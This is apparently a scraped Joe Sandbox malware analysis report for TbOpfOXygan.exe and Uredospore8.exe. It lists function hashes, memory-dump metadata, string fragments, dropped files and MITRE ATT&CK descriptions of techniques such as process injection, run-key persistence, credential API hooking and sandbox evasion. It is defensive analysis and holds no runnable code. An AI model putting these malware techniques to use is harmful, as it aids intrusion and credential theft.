Opcode Fuzzy Hash: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
Instruction Fuzzy Hash: AA01F471644318AFEB12DE50CC85FAA73FCEF44B04F510595BB49EE0C5EAB065848AD9

Function 02683FDE Relevance: .0, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000026.00000002.3362395547.0000000002680000.00000040.00000001.00020000.00000000.sdmp, Offset: 02680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_2680000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6894170d7038a3f9f967b47c80f72c41a6d0015feba2888870859869def464f
Instruction ID: d664c5bc9737a260f92e5f878e4e7a9c35081460b3541e76bc63e8ab20fc057f
Opcode Fuzzy Hash: b6894170d7038a3f9f967b47c80f72c41a6d0015feba2888870859869def464f
Instruction Fuzzy Hash: 5AF065705482C5D7FB607FB0CC89B5E36A99F2174DF0402D9EA49BE495CF7884508E7A

Non-executed Functions

Function 026847F8 Relevance: 6.4, Strings: 5, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

-Age, xrefs: 02684933
ie: , xrefs: 026848B1
User, xrefs: 0268492D
Cook, xrefs: 026848AB
nt: , xrefs: 02684939

Memory Dump Source

Source File: 00000026.00000002.3362395547.0000000002680000.00000040.00000001.00020000.00000000.sdmp, Offset: 02680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_2680000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID: -Age$Cook$User$ie: $nt:
API String ID: 0-2052191038
Opcode ID: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
Instruction ID: 4b907a4dded25301c541ff19e2e31a8c4c19adc1abc8a217dc94dcdb78d2df15
Opcode Fuzzy Hash: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
Instruction Fuzzy Hash: 354174B2600209BFEF22AF64CC48BDEBBB9FF84744F154159EA44AB254DB709650CF94

Function 026847F7 Relevance: 6.4, Strings: 5, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

-Age, xrefs: 02684933
ie: , xrefs: 026848B1
User, xrefs: 0268492D
Cook, xrefs: 026848AB
nt: , xrefs: 02684939

Memory Dump Source

Source File: 00000026.00000002.3362395547.0000000002680000.00000040.00000001.00020000.00000000.sdmp, Offset: 02680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_2680000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID: -Age$Cook$User$ie: $nt:
API String ID: 0-2052191038
Opcode ID: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
Instruction ID: 40b3ee5fe53218e8059285cf7479cd625af0be14ded4ee29c219be94e7f57af2
Opcode Fuzzy Hash: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
Instruction Fuzzy Hash: F94174B2600209BFEF229F64CC84BEEBBB9FF84744F154159EA44AB254DB709650CF94

Analysis Process: TbOpfOXygan.exePID: 2800, Parent PID: 616COMMON

Executed Functions

Function 0255097F Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000027.00000002.3363380012.0000000002550000.00000040.00000001.00020000.00000000.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_2550000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
Instruction ID: b45694c255433161b592967e3b74e06041a67b0c8ea2e8ae7b0a80784df617e0
Opcode Fuzzy Hash: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
Instruction Fuzzy Hash: 1E41BD71240228AFEF229F60CC85FA977ACFF44744F040196BE49AE0D5DB70A690CE69

Function 02551386 Relevance: .1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000027.00000002.3363380012.0000000002550000.00000040.00000001.00020000.00000000.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_2550000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
Instruction ID: 2e216d82d488a6434709df4acf010a154fc2e1bf8a52a2a7f6863ee2a9664e4a
Opcode Fuzzy Hash: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
Instruction Fuzzy Hash: 5F218B31900266AFDB119F78C848B9DBFB5BF44714F058226FD59AF2D0E770A810CB98

Function 02551528 Relevance: .1, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000027.00000002.3363380012.0000000002550000.00000040.00000001.00020000.00000000.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_2550000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7d754d995ee471e61356b6a085558e47ef38c517a54f5d661099b17a988a728
Instruction ID: 0a6677450b70a5046ecc86b41bb43af0e4b2fd893816ae0a9843810e8ef259b4
Opcode Fuzzy Hash: e7d754d995ee471e61356b6a085558e47ef38c517a54f5d661099b17a988a728
Instruction Fuzzy Hash: D1110DB2414925AEDF03AF20C5D49AA73EDBE80704B46096A9D89EE049EF709154CEE9

Function 025509A8 Relevance: .0, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000027.00000002.3363380012.0000000002550000.00000040.00000001.00020000.00000000.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_2550000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
Instruction ID: 16237d4b304d9167a7ce7c731d7b67161020c27435082c22572cd4492582923b
Opcode Fuzzy Hash: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
Instruction Fuzzy Hash: F101F471644328AFEB12DE50CC85FAA73FCEF44B04F500595BB49EE0C5EAB065848AD9

Function 02553FDE Relevance: .0, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000027.00000002.3363380012.0000000002550000.00000040.00000001.00020000.00000000.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_2550000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6894170d7038a3f9f967b47c80f72c41a6d0015feba2888870859869def464f
Instruction ID: 8123b9244fa7dbce5b400df1093b5befc029319c8ee1e31accf5c8cb94870909
Opcode Fuzzy Hash: b6894170d7038a3f9f967b47c80f72c41a6d0015feba2888870859869def464f
Instruction Fuzzy Hash: 5BF08C304482A1D7EB507FA0CCA8B6D36A9BF81308F000082AE4DBE4A0CE7840808E7A

Non-executed Functions

Function 025547F7 Relevance: 6.4, Strings: 5, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

User, xrefs: 0255492D
Cook, xrefs: 025548AB
nt: , xrefs: 02554939
-Age, xrefs: 02554933
ie: , xrefs: 025548B1

Memory Dump Source

Source File: 00000027.00000002.3363380012.0000000002550000.00000040.00000001.00020000.00000000.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_2550000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID: -Age$Cook$User$ie: $nt:
API String ID: 0-2052191038
Opcode ID: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
Instruction ID: ce2c7023a2f02dfd93baf75e035007c285fcd877b818b3cc9ddaf3d342734e39
Opcode Fuzzy Hash: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
Instruction Fuzzy Hash: 424174B2600218BFEF129F64CC44BDEBFB9FF84744F154059EA44AA154DB709650CF98

Function 025547F8 Relevance: 6.4, Strings: 5, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

User, xrefs: 0255492D
Cook, xrefs: 025548AB
nt: , xrefs: 02554939
-Age, xrefs: 02554933
ie: , xrefs: 025548B1

Memory Dump Source

Source File: 00000027.00000002.3363380012.0000000002550000.00000040.00000001.00020000.00000000.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_2550000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID: -Age$Cook$User$ie: $nt:
API String ID: 0-2052191038
Opcode ID: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
Instruction ID: e7eeb5809d985d97c160eb8a61178a61dcf26a5f12aea6ac15d03852e458f6e1
Opcode Fuzzy Hash: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
Instruction Fuzzy Hash: F24151B2600218BFEF129F64CC48BDEBFB9FF84744F154059EA44AA154DB709690CB98

Analysis Process: TbOpfOXygan.exePID: 2748, Parent PID: 616COMMON

Executed Functions

Function 0213097F Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000028.00000002.3364034351.0000000002130000.00000040.00000001.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_2130000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
Instruction ID: cc9879bdc1773d553bedd92fad79b70ceb731a192b37d4c8455b99849bfe4460
Opcode Fuzzy Hash: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
Instruction Fuzzy Hash: 42413D71680218AFEB239F60CC85FA977ADEF44744F040195BA49AE0D9DB70A690CE65

Function 02131386 Relevance: .1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000028.00000002.3364034351.0000000002130000.00000040.00000001.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_2130000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
Instruction ID: a0caeba26ab064adbad120a127a2554c5b11f2f11754e050deae8cbf0820592b
Opcode Fuzzy Hash: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
Instruction Fuzzy Hash: AB219D31A44256AFDB12DF78C848B9DBBB6AF04724F058225F959AF2D0E770A810CB94

Function 02131528 Relevance: .1, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000028.00000002.3364034351.0000000002130000.00000040.00000001.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_2130000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a0e7f0d646b88fd6e9b71376c3a42f9967952cb2f02f24ce030c4017fa39755
Instruction ID: 4e074fa6ac65b70ee3b888f4903b80b3b027e667b3a1ac8bf46ecb06f87c6a0f
Opcode Fuzzy Hash: 0a0e7f0d646b88fd6e9b71376c3a42f9967952cb2f02f24ce030c4017fa39755
Instruction Fuzzy Hash: B011C172444514AEEF03AF20C5C8CAB77EDEE40704B45096A9D89EF44DEF709154CEE5

Function 021309A8 Relevance: .0, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000028.00000002.3364034351.0000000002130000.00000040.00000001.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_2130000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
Instruction ID: 8ba4de1e51271b6d4937451cf128e2fb2cf12089e2e43ccb572449881f67f309
Opcode Fuzzy Hash: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
Instruction Fuzzy Hash: 4E01F471644318AFEB23DE50CC85FAA73FCEF44B44F500595BB49EE0C5EAB065848AD9

Function 02133FDE Relevance: .0, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000028.00000002.3364034351.0000000002130000.00000040.00000001.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_2130000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36476293484b907569b970ce3498e9f116e42be6cd6cdab6510587e434236c7b
Instruction ID: a26cda04d78c35127ff7c4c7306a1fff9e77f20bbcd0c8e19122027689031afd
Opcode Fuzzy Hash: 36476293484b907569b970ce3498e9f116e42be6cd6cdab6510587e434236c7b
Instruction Fuzzy Hash: 79F039706C8280DFFB627BB08C89B8D36AB9F01709F050090EA5ABE595CF7884508E76

Non-executed Functions

Function 021347F7 Relevance: 6.4, Strings: 5, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

nt: , xrefs: 02134939
Cook, xrefs: 021348AB
User, xrefs: 0213492D
-Age, xrefs: 02134933
ie: , xrefs: 021348B1

Memory Dump Source

Source File: 00000028.00000002.3364034351.0000000002130000.00000040.00000001.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_2130000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID: -Age$Cook$User$ie: $nt:
API String ID: 0-2052191038
Opcode ID: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
Instruction ID: d15c3c546210b32b8eae87fd096f5beb3f6cb004180f221fa6757d6709b1e945
Opcode Fuzzy Hash: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
Instruction Fuzzy Hash: 294177B2600208BFEF129F64CC44BEEBBBAFF84744F154159EA44AB254DB749550CF94

Function 021347F8 Relevance: 6.4, Strings: 5, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

nt: , xrefs: 02134939
Cook, xrefs: 021348AB
User, xrefs: 0213492D
-Age, xrefs: 02134933
ie: , xrefs: 021348B1

Memory Dump Source

Source File: 00000028.00000002.3364034351.0000000002130000.00000040.00000001.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_2130000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID: -Age$Cook$User$ie: $nt:
API String ID: 0-2052191038
Opcode ID: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
Instruction ID: 96954695dd69586eeb4cbc1767f6ef80bffdbfb6d15216b22c8307d2b702c3de
Opcode Fuzzy Hash: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
Instruction Fuzzy Hash: 074175B2600208BFEF129F64CC48BDEBBBAFF84744F154059EA44AB254DB749650CF94

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	Drive: Drive Modification, File: File Modification, Firmware: Firmware Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Uredospore8.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db-wal

C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log

C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat

C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\Content\26C212D9399727259664BDFCA073966E_F9F7D6A7ECE73106D2A8C63168CDA10D

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\26C212D9399727259664BDFCA073966E_F9F7D6A7ECE73106D2A8C63168CDA10D

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\DQECM999\www.bing[1].xml

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{aa33990c-54dd-4e13-9458-196cc03599c3}\0.0.filtertrie.intermediate.txt

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{aa33990c-54dd-4e13-9458-196cc03599c3}\0.1.filtertrie.intermediate.txt

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{aa33990c-54dd-4e13-9458-196cc03599c3}\0.2.filtertrie.intermediate.txt

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{aa33990c-54dd-4e13-9458-196cc03599c3}\Apps.ft

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{aa33990c-54dd-4e13-9458-196cc03599c3}\Apps.index

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133694340288381827.txt (copy)

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133694340288381827.txt.~tmp

C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe

Static File Info

Windows Analysis Report
Uredospore8.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre